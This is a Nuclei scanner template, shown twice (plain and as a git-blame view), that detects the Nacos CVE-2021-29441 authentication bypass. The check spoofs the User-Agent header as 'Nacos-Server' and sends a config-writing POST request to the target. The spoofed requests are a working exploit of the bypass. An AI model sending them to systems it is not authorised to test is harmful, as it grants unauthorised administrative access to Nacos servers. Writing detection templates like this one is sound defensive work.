nuclei-templates/cves/2021/CVE-2021-29441.yaml

id: CVE-2021-29441

info:
  name: Nacos prior to 1.4.1 Authentication Bypass
  description: |
    This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.

    In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)
    Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that
    enables Nacos servers to bypass this filter and therefore skip authentication checks.
    This mechanism relies on the user-agent HTTP header so it can be easily spoofed.
    This issue may allow any user to carry out any administrative tasks on the Nacos server.
  author: dwisiswant0
  severity: high
  reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
  tags: nacos,auth-bypass,cve,cve2021

requests:
  - raw:
      - |
        POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

      - |
        POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        User-Agent: Nacos-Server

    req-condition: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 403"
          - "status_code_2 == 200"
        condition: and

      - type: dsl
        dsl:
          - "contains(body_1, 'Forbidden')"
          - "contains(body_2, 'true')"
        condition: and

      - type: word
        words:
          - "application/json"
        part: header
Add CVE-2021-29441 2021-04-28 04:54:36 +00:00			`id: CVE-2021-29441`

			`info:`
			`name: Nacos prior to 1.4.1 Authentication Bypass`
			`description: \|`
Update description 2021-04-28 14:01:25 +00:00			`This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.`

Add CVE-2021-29441 2021-04-28 04:54:36 +00:00			`In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)`
			`Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that`
			`enables Nacos servers to bypass this filter and therefore skip authentication checks.`
			`This mechanism relies on the user-agent HTTP header so it can be easily spoofed.`
			`This issue may allow any user to carry out any administrative tasks on the Nacos server.`
			`author: dwisiswant0`
			`severity: high`
			`reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/`
			`tags: nacos,auth-bypass,cve,cve2021`

			`requests:`
template update 2021-05-05 12:53:07 +00:00			`- raw:`
			`- \|`
			`POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`

			`- \|`
			`POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`User-Agent: Nacos-Server`

			`req-condition: true`
Add CVE-2021-29441 2021-04-28 04:54:36 +00:00			`matchers-condition: and`
			`matchers:`
template update 2021-05-05 12:53:07 +00:00			`- type: dsl`
			`dsl:`
			`- "status_code_1 == 403"`
			`- "status_code_2 == 200"`
			`condition: and`

			`- type: dsl`
			`dsl:`
			`- "contains(body_1, 'Forbidden')"`
			`- "contains(body_2, 'true')"`
			`condition: and`

Add CVE-2021-29441 2021-04-28 04:54:36 +00:00			`- type: word`
			`words:`
			`- "application/json"`
template update 2021-05-05 12:53:07 +00:00			`part: header`